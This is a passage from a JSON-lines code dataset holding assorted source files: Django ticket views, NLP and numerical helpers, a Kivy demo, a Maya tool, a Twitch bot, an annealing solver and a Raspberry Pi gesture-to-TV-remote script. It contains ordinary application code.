)\n            \"\"\"\n\n        print(\"result es: \" + str(result))\n        return result\n\ntickets = TicketsListado.as_view()\n\n# shows a single ticket with its data\nclass TicketExpandidoView(UserPassesTestMixin,LoginRequiredMixin, UpdateView):\n    template_name = 'tickets/ticket_expandido.html'\n    view_name = 'ticketexpandido'\n    success_url = None\n    model = TicketBase\n    fields = '__all__'\n    # how many per page for the ListView\n    paginate_by = 10\n    slug_field = 'ticket_id'\n    slug_url_kwarg = 'q'\n    login_url = 'users:404'\n    redirect_field_name = 'no_autorizado'\n\n    def test_func(self):\n        if self.request.user.is_staff:\n            return True\n        t = None\n        try:\n            t = TicketBase.objects.get(id=self.kwargs['pk'])\n            return (str(t.iniciado_por_id) == str(self.request.user.id) or \\\n                str(t.asignado_a_id) == str(self.request.user.id)) and \\\n                t.status != 3\n        except Exception:\n            return False\n\n    #def get_queryset(self):\n        #return TicketBase.objects.get(id=self.request.ticketid)\n\n    def get_context_data(self, **kwargs):\n        context = super(TicketExpandidoView, self).get_context_data(**kwargs)\n        print(str(self.object))\n        #proveedor = Proveedor.objects.get(username=self.object.iniciado_por.username)\n        # added because a Django query that matches nothing raises an exception; handle it this way.\n        try:\n            proveedor = Proveedor.objects.get(username=self.object.iniciado_por.username)\n        except ObjectDoesNotExist:\n            proveedor = None\n        context['proveedor'] = proveedor\n        user = User.objects.get(username=self.object.iniciado_por.username)\n        context['user'] = user\n        context['seguimientos'] = Seguimiento.objects.filter(ticket_base_id=self.kwargs['pk'])\n        try:\n            ticket_trabajo = TicketAltaTrabajo.objects.get(ticket_relacionado_id=self.kwargs['pk'])\n            if ticket_trabajo is not None:\n                context['ticket'] = ticket_trabajo\n                if ticket_trabajo.trabajo_relacionado.tipo in \"Sin presupuesto previo\":\n                    context['trabajo'] = TipoSinPresupuestoPrevio.objects.get(id=ticket_trabajo.trabajo_relacionado.id)\n                elif ticket_trabajo.trabajo_relacionado.tipo in \"Con presupuesto previo\":\n                    context['trabajo'] = TipoPresupuestoPrevio.objects.get(id=ticket_trabajo.trabajo_relacionado.id)\n        except ObjectDoesNotExist as e:\n            print(\"Exception desde TicketExpandido: \" + str(e))\n        try:\n            ticket_trabajo = TicketAsignarProveedores.objects.get(ticket_relacionado_id=self.kwargs['pk'])\n            if ticket_trabajo is not None:\n                context['ticket'] = ticket_trabajo\n                context['trabajo'] = ticket_trabajo.trabajo_relacionado\n        except ObjectDoesNotExist as e:\n            print(\"Exception desde TicketExpandido: \" + str(e))\n        \"\"\"\n        try:\n            ticket_asignacion = TicketAsignarProveedores.objects.get(ticket_relacionado_id=self.kwargs['pk'])\n            if proveedor is not None:\n                iniciador = proveedor\n            else:\n                iniciador = user\n            context['listado_proveedores'] = ticket_asignacion.listado_proveedores(iniciador)\n            print(\"listado es: \" + str(context['listado_proveedores']))\n        except ObjectDoesNotExist:\n            print(\"no es ticket de asignacion_proveedores\")\n            context['listado_proveedores'] = None\n        \"\"\"\n        #context['resultado'] = resultado\n        #if self.request.user.is_superuser:\n        return context\n\n\n    \"\"\"\n    POST handler: accept button for the provider-applicant form, plus job-ticket actions\n    \"\"\"\n    def post(self, request, *args, **kwargs):\n        if request.POST:\n            if '_editar_trabajo' in request.POST:\n                # redirect to the page for updating budgets\n                return redirect(to='actualizar_sin_presupuesto_previo', pk=self.kwargs['pk'])\n            if '_aprobar' in request.POST:\n                \"\"\"\n                Add permissions...\n                \"\"\"\n                try:\n                    ticket = TicketBase.objects.get(id=self.kwargs['pk'])\n                except Exception as e:\n                    return redirect(to='tickets:error_resolviendo_ticket')\n                # concurrency: first check whether the ticket is RESOLVED / CLOSED / WAITING FOR CLIENT CHANGES\n                if ticket.status in [3,4,7,]:\n                    return redirect(to='tickets:error_resolviendo_ticket')\n                else:\n                    ticket.save()\n                    ticket.resolver_ticket()\n                    return redirect(to='home')\n\n            if '_avisar_cambios_realizados' in request.POST:\n                \"\"\"\n                Notify the administrator that the requested changes were made\n                \"\"\"\n                try:\n                    ticket = TicketBase.objects.get(id=self.kwargs['pk'])\n                except Exception as e:\n                    return redirect(to='tickets:error_resolviendo_ticket')\n                ticket.save()\n                ticket.avisar_cambios_realizados()\n                return redirect(to='tickets:ticket_expandido',pk=self.kwargs['pk'])\n            if '_aprobar_alta_trabajo' in request.POST:\n                # approve the new job and generate a ticket assigning providers to it\n                try:\n                    ticket = TicketBase.objects.get(id=self.kwargs['pk'])\n                except Exception as e:\n                    return redirect(to='tickets:error_resolviendo_ticket')\n\n                # concurrency: first check whether the ticket is RESOLVED / CLOSED / WAITING FOR CLIENT CHANGES\n                if ticket.status in [3,4,7,]:\n                    return redirect(to='tickets:error_resolviendo_ticket')\n                else:\n                    ticket.save()\n                    ticket.resolver_ticket()\n                    return redirect(to='tickets:ticket_expandido', pk=self.kwargs['pk'])\n            if '_asignar_proveedores_a_trabajo' in request.POST:\n                return redirect(to='tickets:ticket_expandido', pk=self.kwargs['pk'])\n            if '_cambiar_a_sin_presupuesto_previo' in request.POST:\n                ticket = TicketBase.objects.get(id=self.kwargs['pk'])\n                ticket_alta = TicketAltaTrabajo.objects.get(ticket_relacionado_id=ticket.id)\n                # look up the job via the id stored on the creation ticket\n                trabajo_conpp = ticket_alta.trabajo_relacionado\n                # resolution method:\n                # new job without prior budget, created from the data of the job with prior budget\n                trabajo_sinpp_nuevo = TipoSinPresupuestoPrevio()\n                trabajo_sinpp_nuevo.tipo = \"Sin presupuesto previo\"\n                trabajo_sinpp_nuevo.iniciado_por = self.request.user\n                trabajo_sinpp_nuevo.proveedor_con_empresa = trabajo_conpp.proveedor_con_empresa\n                trabajo_sinpp_nuevo.departamento = trabajo_conpp.departamento\n                trabajo_sinpp_nuevo.direccion = trabajo_conpp.direccion\n                
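# copy the remaining schedule flag and the task list from the old job below\n                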
trabajo_sinpp_nuevo.trabaja_fin_de_semanas = trabajo_conpp.trabaja_fin_de_semanas\n                trabajo_sinpp_nuevo.save()\n                # populate the new no-prior-budget job with the tasks of the pre-budget job\n                for tarea in trabajo_conpp.tareas_a_realizar.all():\n                    t = get_tarea_base(tarea.tipo)\n                    t.descripcion = tarea.descripcion\n                    t.con_materiales = tarea.con_materiales\n                    t.tipo = tarea.tipo\n                    t.save()\n                    # attach the freshly copied task, not the original one:\n                    # the original is removed together with trabajo_conpp below\n                    trabajo_sinpp_nuevo.tareas_a_realizar.add(t)\n                # save the new job / delete the budgeted job's data from the DB\n                trabajo_sinpp_nuevo.save()\n                borrar_tickets_asociados_a_trabajo(trabajo_conpp)\n                trabajo_conpp.delete()\n                return redirect(to='vista_previa_sin_presupuesto_previo', pk=trabajo_sinpp_nuevo.id)\n\n\nticketexpandido = TicketExpandidoView.as_view()\n\n\n\"\"\"\ndef get_queryset(self):\n\n    import operator\n\n    from django.db.models import Q\n    #import de reduce desde python 2 para hacer la busquerda mas rapido en django 1.6+\n    from functools import reduce\n    result = super(TicketExpandidoView, self).get_queryset()\n\n    query = self.request.GET.get('q')\n    if query:\n        query_list = query.split()\n        result = result.filter(\n            reduce(operator.and_,\n                   (Q(asignado_a__icontains=q) for q in query_list)) |\n            reduce(operator.and_,\n                   (Q(depende_en___icontains=q) for q in query_list))\n        )\n\n    return result \"\"\"\n\n\n\nclass AgregarSeguimiento(UserPassesTestMixin,LoginRequiredMixin,CreateView):\n    template_name = \"tickets/agregar_msg_seguimiento.html\"\n    view_name = 'agregarseguimiento'\n    model = Seguimiento\n    form_class = FormularioSeguimiento\n    login_url = 'users:404'\n    redirect_field_name = 'no_autorizado'\n\n    def test_func(self):\n        t = None\n        try:\n            t = TicketBase.objects.get(id=self.kwargs['pk'])\n        except Exception:\n            return False\n        return str(t.iniciado_por_id) == str(self.request.user.id) \\\n            or str(t.asignado_a_id) == str(self.request.user.id)\n\n    # save the form\n    def get_context_data(self, **kwargs):\n        context = super(AgregarSeguimiento, self).get_context_data(**kwargs)\n        context[\"id\"] = self.kwargs['pk']\n        return context\n\n    def form_valid(self, form):\n        data = form.cleaned_data\n        idTicket = self.kwargs['pk']\n        # concurrency: if the ticket no longer exists, the job was cancelled in the meantime\n        try:\n            t = TicketBase.objects.get(id=idTicket)\n        except Exception as e:\n            print(\"Exception desde AgregarSeguimiento:\" + str(e))\n            return redirect(to=\"users:404\")\n        s = Seguimiento()\n        s.comentario = data['comentario']\n        s.titulo = data['titulo']\n        s.ticket_base = t\n        s.fecha = timezone.now()\n        s.usuario = self.request.user\n        s.save()\n        # add a temporary permission so the provider can change their data\n        # (this is now done from the ticket update)\n        #proveedor = Proveedor.objects.get(id=t.iniciado_por_id)\n        #proveedor.seguimiento_proveedor()\n\n        return redirect(to='tickets:ticket_expandido', pk=t.id)\n\n\nagregarseguimiento = AgregarSeguimiento.as_view()\n\n# form to update tickets, intended to be used only by an administrator\nclass ActualizarTicket(UserPassesTestMixin,LoginRequiredMixin,UpdateView):\n    form_class = FormularioActualziarTicket\n    view_name = 'actualizarticket'\n    model = TicketBase\n    template_name = 'tickets/actualizar_ticket.html'\n    success_url = None\n    login_url = 'users:404'\n    redirect_field_name = 'no_autorizado'\n\n    def test_func(self):\n        try:\n            TicketBase.objects.get(id=self.kwargs['pk'])\n        except Exception:\n            return False\n        return self.request.user.is_staff\n\n    def get_context_data(self, **kwargs):\n        ret = 
super(ActualizarTicket,self).get_context_data(**kwargs)\n if self.request.POST:\n formset = FormularioSeguimiento(self.request.POST)\n ret['seguimiento'] = formset\n idTicket = self.kwargs['pk']\n try:\n t = TicketBase.objects.get(id=idTicket)\n ret['ticket'] = t\n except Exception as e:\n print(\"Exception desde ActualizarTicket:\" + str(e))\n return redirect(to=\"users:404\")\n else:\n formset = FormularioSeguimiento()\n ret['seguimiento'] = formset\n idTicket = self.kwargs['pk']\n try:\n t = TicketBase.objects.get(id=idTicket)\n ret['ticket'] = t\n except Exception as e:\n print(\"Exception desde ActualizarTicket:\" + str(e))\n return redirect(to=\"users:404\")\n ret.update(self.kwargs)\n return ret\n\n def form_valid(self, form):\n context = self.get_context_data()\n formset = context['seguimiento']\n t = context['ticket']\n\n if formset.is_valid():\n data = formset.cleaned_data\n idTicket = self.kwargs['pk']\n #Concurrencia\n #Primero revisar si ticket esta en status CERRADO / RESUELTO / ESPERANDOCAMBIOSDESDECLIENTE\n if t is None or t.status in [3,4,7,]:\n return redirect(to='tickets:error_resolviendo_ticket')\n try:\n t = TicketBase.objects.get(id=idTicket)\n except Exception as e:\n return redirect(to='tickets:error_resolviendo_ticket')\n s = Seguimiento()\n s.comentario = data['comentario']\n s.titulo = data['titulo']\n s.ticket_base = t\n s.fecha = timezone.now()\n s.usuario = self.request.user\n ## Try con excepcion de concurrencia\n t = form.save()\n s.save()\n status = form.cleaned_data['status']\n t.cambiar_status(status,s)\n #Si el ticket es cambiado a status 7 o esperando cambios desde usuario darle la oportunidad al usuario de\n #hacer los cambios esperados por el ticket\n print(form.cleaned_data['status'])\n if form.cleaned_data['status'] == 7:\n t.habilitar_cambios_esperados()\n return redirect(to='tickets:ticket_expandido', pk=self.kwargs['pk'])\n else:\n return render_to_response(self.template_name, context, context_instance=RequestContext(self.request))\n\nactualizarticket = ActualizarTicket.as_view()\n\n\n\ndef error_resolviendo_ticket(request):\n response = render_to_response('pages/error_resolviendo_ticket.html', {},\n context_instance=RequestContext(request))\n return response\n","sub_path":"construct_star/tickets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"92981796","text":"import tfidf\r\nimport fio\r\nimport ILP_baseline as ILP\r\nimport SennaParser\r\nimport porter\r\n\r\nfrom ILP_baseline import stopwords\r\n\r\nstopwordfilename = \"../../../Fall2014/summarization/ROUGE-1.5.5/data/smart_common_words_stemmed.txt\"\r\n\r\ntfidfext = \".tfidf\"\r\nposext = '.pos'\r\n\r\nphraseext = \".key\" #a list\r\nstudentext = \".keys.source\" #json\r\ncountext = \".dict\" #a dictionary\r\n\r\ndef getWordPos(sentence, ngram, NoStopWords=True):\r\n words_pos = []\r\n \r\n tokens = [(porter.getStemming(word.token.lower()), word.pos) for word in sentence.words]\r\n \r\n N = len(tokens)\r\n for n in ngram:\r\n for i in range(N):\r\n if i+n > N: continue\r\n ngram = tokens[i:i+n]\r\n \r\n if not NoStopWords:\r\n words = [w for w,pos in ngram]\r\n pos = [pos for w,pos in ngram]\r\n words_pos.append((\" \".join(words), ' '.join(pos)))\r\n else:\r\n removed = True\r\n for w,pos in ngram:\r\n if w not in stopwords:\r\n removed = False\r\n \r\n if not removed:\r\n words = [w for w,pos in ngram]\r\n pos = [pos for w,pos in ngram]\r\n 
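# keep this n-gram only when at least one token survived the stopword filter\r\n                    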
words_pos.append((\" \".join(words), ' '.join(pos)))\r\n \r\n return words_pos\r\n\r\ndef extact_pos(datadir, sennadatadir, np, ngram, sheets = range(0,12), types=['POI', 'MP', 'LP']):\r\n for i, sheet in enumerate(sheets):\r\n week = i + 1\r\n dir = datadir + str(week) + '/'\r\n \r\n for type in types:\r\n prefix = dir + type\r\n prefix = prefix + '.' + np \r\n \r\n dict = {}\r\n \r\n sennafile = sennadatadir + \"senna.\" + str(week) + \".\" + type + '.output'\r\n if not fio.IsExist(sennafile): continue\r\n \r\n sentences = SennaParser.SennaParse(sennafile)\r\n for s in sentences:\r\n words_pos = getWordPos(s, ngram)\r\n \r\n for w, pos in words_pos:\r\n dict[w] = pos\r\n \r\n pos_file = prefix + posext\r\n \r\n fio.SaveDict(dict, pos_file, SortbyValueflag = True)\r\n \r\nif __name__ == '__main__': \r\n datadir = \"../../data/ILP_Sentence_Supervised_FeatureWeighting/\"\r\n \r\n sennadatadir = \"../../data/senna/\"\r\n \r\n extact_pos(datadir, sennadatadir, np = 'sentence', ngram=[1,2])","sub_path":"get_ngram_pos.py","file_name":"get_ngram_pos.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"568723116","text":"nouns = [\n[['словарь', 'dictionary'], 'm', [], 'May not be male'],\n[['книга', 'book'], 'f', [], 'May not be male'],\n[['карандаш', 'pencil'], 'm', [], 'May not be male']]\n#(word, gender, exceptions, notes)\n#([word in Rus, word in Eng], 'm' 'f' 'n' or 'p', [[excep declination, exeption], [etc...]], 'notes')\n\nverbs = [\n[['читать', 'to read', 'почитать'], 'e', [], 'Check impf'],\n[['писать', 'to write', 'написать'], 'e', [], 'Check impf']]\n#(word, conjugation, exceptions, notes)\n#([impf word in Rus, word in Eng, perf word in Rus], 'e' or 'i', [[exep tence, exeption], [etc...]], 'notes')\n\nadjective = [\n[['большой', 'big'], [], ''],\n[['хороший', 'good'], [], '']]\n#(word, exceptions, notes)\n#([word in Rus, word in Eng], [[exep case, exeption], [etc...]], 'notes')\n\nadverb = [\n[['плохо', 'bad'], [], ''],\n[['сегодня', 'today'], [], '']]\n#(word, exceptions, notes)\n#([word in Rus, word in Eng], [[exep case, exeption], [etc...]], 'notes')\n","sub_path":"Slovar.py","file_name":"Slovar.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"214301183","text":"import numpy as np \nimport matplotlib.pyplot as plt \n\ndef haar(x):\n\tres = np.zeros(len(x))\n\tindex = (0 <= x) & (x <=1)\n\tres[index] = 1.0\n\treturn res \n\n\ndef plot_matrix(matrix):\n\tmatrix[abs(matrix)< 1e-6] = 0.0\n\tplt.spy(matrix, markersize = 2)\n\tplt.show() \n\ndef counter_identity(n):\n\treturn np.eye(n)[::-1]\n\n\ndef spline_support( k, j, d):\n\t\"\"\" Provides the support of spline indexed by 'k' in \n\tthe Schoenberg spline basis of degree d on [0,1] \n\twith detail level 'j'\n\t\"\"\" \n\tif (k+d) <= d-1:\n\t\tl1 = 0\n\t\tl2 = 2**(-j)*(k+d)\n\telif (k+d) <= 2**j:\n\t\tl1 = 2**(-j)*k\n\t\tl2 = 2**(-j)*(k+d)\n\telse:\n\t\tl1 = 2**(-j)*k \n\t\tl2 = 1\n\n\treturn l1, l2 \n\n","sub_path":"src/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"231241450","text":"# from io import StringIO\nimport os\nimport sys\nfrom pathlib import Path\n\nfrom kivy.app import App\nfrom kivy.uix.gridlayout import GridLayout\n# from kivy.uix.togglebutton import ToggleButton\nfrom 
kivy.properties import StringProperty, BooleanProperty\n\n\nroot_path: Path = os.path.split((os.path.dirname(__file__)))[0]\nsys.path.append(root_path)\n# for import of Fonts dir\nfont_path: Path = os.path.join(root_path, f'Main/Fonts{os.sep}')\nimage_path: Path = os.path.join(root_path, f'Main/images{os.sep}')\n\n\nclass WidgetsExamples(GridLayout):\n    count = 0\n    count_enabled = BooleanProperty(False)\n    my_text = StringProperty(\"0\")\n    text_input_str = StringProperty(\"foo\")\n    # slider_value_txt = StringProperty(\"0\")\n    font_lcd: Path = os.path.join(font_path, \"Lcd.ttf\")\n    image_bg1: Path = os.path.join(image_path, \"bg1.jpg\")\n    print(image_bg1)\n\n    def on_button_click(self):\n        # print(\"Button clicked\")\n        if self.count_enabled:\n            self.count += 1\n            self.my_text = str(self.count)\n\n    def on_toggle_button_state(self, widget):\n        # print(\"toggle state\" + widget.state)\n        if widget.state == \"normal\":\n            widget.text = \"OFF\"\n            self.count_enabled = False\n        else:\n            widget.text = \"ON\"\n            self.count_enabled = True\n\n    def on_switch_active(self, widget):\n        print(\"Switch: \" + str(widget.active))\n\n    def on_text_validate(self, widget):\n        self.text_input_str = widget.text\n\n\nclass TheLabApp(App):\n    pass\n\n\nTheLabApp().run()\n","sub_path":"TheLab_03_TextInput/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"31855890","text":"# -*- coding: utf-8 -*-\nimport codecs\nimport csv\nimport json\nimport os\nimport zipfile\nfrom django.template.loader import render_to_string\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.utils.translation import ugettext as _\nfrom frame.models import Token\nfrom django.contrib.auth.models import User\nfrom tools.utils import json_response\nfrom tools.iam_client import user_list\nfrom django.conf import settings\nfrom tools.record_opr_log import getLogger\nfrom celery import task as celery_task\nfrom resource.utils import get_scope_label_by_ip\nimport sys\n\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nlogger = getLogger()\n\n\n@celery_task\ndef exports_resource(body):\n    \"\"\"\n    Export the resource list as a CSV report (zipped and sent by email)\n    \"\"\"\n    logger.info('Begin to export group')\n\n    sort = body.get(\"sort\").encode(\"utf-8\")\n    search_list = body.get(\"search_list\").encode(\"utf-8\")\n    search_keyword = body.get(\"search_keyword\", '{}').encode(\"utf-8\")\n    page = int(body.get(\"page\", 1))\n    username = body.get(\"username\").encode(\"utf-8\")\n    id = body.get(\"id\", 1)\n    size = int(body.get(\"size\", 20))\n\n\n    if not page or not size:\n        logger.info('parameters error: page or size can not be empty.')\n        return json_response({'status': -1, 'error': 'parameters error: page or size can not be empty.'})\n\n    to = str(user_list(username)[0].get('email')).split(\",\")\n\n    the_file_name = \"download.csv\"\n    the_file_name_zip = u'download' + '.zip'\n    subject, from_email = u\"资源导出报表\", u\"云眼数据<%s>\" % settings.DEFAULT_FROM_EMAIL\n    bod = render_to_string(\"export_report.html\")\n    msg = EmailMultiAlternatives(subject=subject, body=bod, from_email=from_email, to=to)\n    msg.attach_alternative(bod, 'text/html')\n    f = open(the_file_name, 'wb')\n    f.write(codecs.BOM_UTF8)\n    writer = csv.writer(f)\n    writer.writerow(\n        [_(u\"id\"),\n         _(u\"名称\"),\n         _(u\"IP地址\"),\n         _(u\"CPU(核数)\"),\n         _(u\"内存(GB)\"),\n         _(u\"磁盘(GB)\"),\n         _(u\"操作系统\"),\n         _(u\"所属业务\"),\n         _(u\"所属分组\"),\n         _(u\"入CMDB时间\")])\n\n    request_dict = {\"id\": id, \"page\": page, \"size\": size, \"sort\": sort, \"search_list\": 
search_list,\n \"search_keyword\": search_keyword}\n\n from views import get_group_member_list\n result = get_group_member_list(request_dict)\n resource_list = []\n if result.status_code == 200:\n r = json.loads(result.content)\n resource_list = r.get('item_list')\n\n for resource_info in resource_list:\n writer.writerow(\n [_get_value(resource_info, 'model_id')\n , _get_value(resource_info, 'hostname')\n , _get_value(resource_info, 'ip')\n , _get_value(resource_info, 'cpu')\n , _get_value(resource_info, 'memory')\n , _get_value(resource_info, 'hard_disk')\n , _get_value(resource_info, 'os')\n , get_scope_label_by_ip(_get_value(resource_info, 'ip'), None)\n , _get_value(resource_info, 'groups')\n , _get_value(resource_info, 'cmdb_time')\n ])\n\n f.close()\n z = zipfile.ZipFile(the_file_name_zip, 'w', zipfile.ZIP_DEFLATED)\n z.write(the_file_name)\n z.close()\n msg.attach_file(the_file_name_zip)\n msg.send()\n os.remove(the_file_name_zip)\n os.remove(the_file_name)\n logger.info(\"export_resource success!\")\n\n\ndef _get_value(resource_info, name):\n label_str = u\"\"\n try:\n value = resource_info.get(name)\n if value:\n label_str = value\n else:\n label_str = \"\"\n except Exception as e:\n logger.error(\"_get_value error:%s\" % (str(e)))\n return label_str\n","sub_path":"WiseEye/cmdb_back/resource/rscgroup/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"482235693","text":"import maya.cmds as cmds\ndef centerParent(parent1, parent2, child, offset):\n\tif child == None:\n\t\tchild = cmds.spaceLocator(n='_TEMP_LOC_')\n\t\tcmds.refresh()\n\t\tconstraint = cmds.parentConstraint(parent1, parent2, child, n='_TEMP_CONSTRAINT_', mo=False)\n\t\tcmds.refresh()\n\t\tlocation = cmds.xform(child, q=True, t=True)\n\t\tlocation = [location[0], location[1], location[2] + (location[0] + location[1]) * offset * -1]\n\t\tcmds.refresh()\n\t\tcmds.delete(child, constraint)\n\t\tcmds.refresh()\n\t\treturn location\n\telse:\n\t\tconstraint = cmds.parentConstraint(parent1, parent2, n=child + 'beingPlaced_', mo=False)\n\t\tcmds.delete(constraint)\n\n\ndef snap(child, parent, r=False):\n\tif r == True:\n\t\tcmds.parentConstraint(child, parent, mo=False, sr=['x', 'y', 'z'], n='deleteMe' + parent + child)\n\telse:\n\t\tcmds.parentConstraint(child, parent, mo=False, n='deleteMe' + parent + child)\n\tcmds.delete('deleteMe' + parent + child)","sub_path":"core/toolKit.py","file_name":"toolKit.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"574430462","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"Main bot file for Kappa Deep.\"\"\"\n\nfrom twitchio.ext import commands\n\nfrom config import config\nfrom tokens import tokens\n\nstartup_extensions = ['extensions.general',\n 'extensions.obs',\n 'extensions.sfx',\n 'extensions.skyline',\n 'extensions.streamelements']\n\nbot = commands.Bot(irc_token=tokens.TWITCH_TOKEN,\n nick=config.NICK,\n prefix=config.PREFIX,\n initial_channels=[config.CHAN])\n\n\n@bot.event\nasync def event_ready():\n \"\"\"Run when bot loads.\"\"\"\n msg = f'{config.NICK} ready for duty! 
Batteries not included.'\n print(msg)\n\n@bot.event\nasync def event_message(message):\n \"\"\"Print messages.\"\"\"\n # print(message._raw_data)\n\n await bot.handle_commands(message)\n\nif __name__ == '__main__':\n for extension in startup_extensions:\n try:\n bot.load_module(extension)\n except Exception as e:\n exc = '{}: {}'.format(type(e).__name__, e)\n print(f'[ERR] Can\\'t load extension {extension}\\n{exc}')\n\nbot.run()","sub_path":"bot_old2.py","file_name":"bot_old2.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"60879465","text":"import random\nimport numpy as np\n\nfrom abs_slr import Abs_slr\nfrom utils.solver_core import simanneal_solve\nfrom utils.funcs import fit_func\nfrom simanneal import Annealer\n\n\nclass Simanneal_slr(Abs_slr):\n _max_iter = None\n\n def __init__(self, max_iter=100):\n super(Simanneal_slr, self).__init__()\n self._max_iter = max_iter\n\n def solve(self, inst, fit_f=None):\n init_sln = np.random.permutation(inst.n)\n\n slr = Func_Annealer(init_sln, inst.dist_mat, fit_f=fit_f)\n slr.steps = self._max_iter\n slr.copy_strategy = 'slice'\n tour, fit = slr.anneal()\n\n head = np.where(tour == 0)[0][0]\n tour = tour[np.arange(head - inst.n, head)]\n\n return {'tour': tour, 'fitness': fit}\n\n\nclass Func_Annealer(Annealer):\n\n \"\"\"Test annealer with a travelling salesman problem.\n \"\"\"\n\n # pass extra data (the distance matrix) into the constructor\n def __init__(self, state, dist_mat, fit_f):\n self.dist_mat = dist_mat\n if fit_f is None:\n self._fit_f = fit_func\n else:\n self._fit_f = fit_f\n super(Func_Annealer, self).__init__(state) # important!\n\n def move(self):\n \"\"\"Swaps two cities in the route.\"\"\"\n a = random.randint(0, len(self.state) - 1)\n b = random.randint(0, len(self.state) - 1)\n self.state[a], self.state[b] = self.state[b], self.state[a]\n\n def energy(self):\n \"\"\"Calculates the length of the route.\"\"\"\n return self._fit_f(self.dist_mat, self.state)\n","sub_path":"solver/simanneal_slr.py","file_name":"simanneal_slr.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"595778263","text":"import cv2\nimport os\nimport tensorflow as tf\nimport pathlib\nimport numpy as np\nfrom object_detection.utils import config_util\nfrom object_detection.builders import model_builder\nfrom object_detection.utils import label_map_util\nfrom object_detection.protos import pipeline_pb2\nfrom object_detection.utils import visualization_utils as viz_utils\nfrom picamera import PiCamera\nfrom picamera.array import PiRGBArray\nimport time\nimport io\nfrom matplotlib import pyplot as plt\nimport vlc\nimport tf_record as xc\n\n\ndef give_command(command): #tv komut numaraları \n switcher = {\n 1: \"bir\",\n 2: \"iki\",\n 3: \"uc\",\n 4: \"dort\",\n 5: \"bes\",\n 6: \"alti\",\n 7: \"yedi\",\n 8: \"sekiz\",\n 9: \"dokuz\",\n 10: \"sifir\",\n 11: \"kanalartir\",\n 12: \"kanalazalt\",\n 13: \"sesac\",\n 14: \"seskapa\",\n 15: \"ackapa\"\n }\n return switcher.get(command)\n\ndef lets_change(command):\n switch_command = {\n 1: \"irsend SEND_ONCE Toshiba KEY_1\",\n 2: \"irsend SEND_ONCE Toshiba KEY_2\",\n 3: \"irsend SEND_ONCE Toshiba KEY_3\",\n 4: \"irsend SEND_ONCE Toshiba KEY_4\",\n 5: \"irsend SEND_ONCE Toshiba KEY_5\",\n 6: \"irsend SEND_ONCE Toshiba KEY_6\",\n 7: \"irsend SEND_ONCE Toshiba KEY_7\",\n 8: \"irsend SEND_ONCE Toshiba KEY_8\",\n 9: 
\"irsend SEND_ONCE Toshiba KEY_9\",\n 10: \"irsend SEND_ONCE Toshiba KEY_0\",\n 11: \"irsend SEND_ONCE Toshiba KEY_CHANNELUP\",\n 12: \"irsend SEND_ONCE Toshiba KEY_CHANNELDOWN\",\n 13: \"irsend SEND_ONCE Toshiba KEY_VOLUMEUP\",\n 14: \"irsend SEND_ONCE Toshiba KEY_VOLUMEDOWN\",\n 15: \"irsend SEND_ONCE Toshiba KEY_POWER\"\n }\n return switch_command.get(command)\n \n\nconfig = config_util.get_configs_from_pipeline_file('/home/pi/Desktop/tsfw/tffiles/modeller/modelimiz/ssd_mobilenet_v2_fpnlite_320x320_coco17_tpu-8/pipeline.config')\n\nconfigs = config_util.get_configs_from_pipeline_file('/home/pi/Desktop/tsfw/tffiles/modeller/modelimiz/ssd_mobilenet_v2_fpnlite_320x320_coco17_tpu-8/pipeline.config')\ndetection_model = model_builder.build(model_config=configs['model'], is_training=False)\n\nckpt = tf.train.Checkpoint(model=detection_model)\nckpt.restore(os.path.join('/home/pi/Desktop/tsfw/tffiles/modeller/modelimiz/ssd_mobilenet_v2_fpnlite_320x320_coco17_tpu-8/', 'ckpt-13')).expect_partial()\n\n\n@tf.function\ndef detect_fn(image):\n image, shapes = detection_model.preprocess(image)\n prediction_dict = detection_model.predict(image, shapes)\n detections_1 = detection_model.postprocess(prediction_dict, shapes) #bu satır\n return detections_1\n \n\ncategory_index = label_map_util.create_category_index_from_labelmap('/home/pi/Desktop/tsfw/tffiles/annotations/label_map.pbtxt')\n\ncamera = PiCamera()\n\ncamera.resolution = (640,480)\ncamera.framerate = 32\nrawCapture = PiRGBArray(camera, size=(640,480))\nrawCapture.truncate(0)\n\nfirst_tour=1\nold_command=0\nchannel_digit=0 #sayılar için\nchanging_digit=0 #kanal,ses komutları için\ntv_channel_command=[]\n\nback=time.time()\ntime.sleep(0.1)\nfont=cv2.FONT_HERSHEY_SIMPLEX\n\n\nfor screen in camera.capture_continuous(rawCapture, format=\"bgr\",use_video_port=True):\n\n image_np = np.copy(screen.array)\n image_np.setflags(write=1)\n input_data=np.expand_dims(image_np, 0)\n input_tensor = tf.convert_to_tensor(input_data, dtype=tf.float32)\n detections = detect_fn(input_tensor)\n\n num_detections = int(detections.pop('num_detections'))\n detections = {key: value[0, :num_detections].numpy()\n for key, value in detections.items()}\n detections['num_detections'] = num_detections\n \n detections['detection_classes'] = detections['detection_classes'].astype(np.int64)\n \n label_id_offset = 1\n image_np_with_detections = image_np.copy()\n\n viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_with_detections,\n detections['detection_boxes'],\n detections['detection_classes'] + label_id_offset,\n detections['detection_scores'],\n category_index,\n use_normalized_coordinates=True,\n 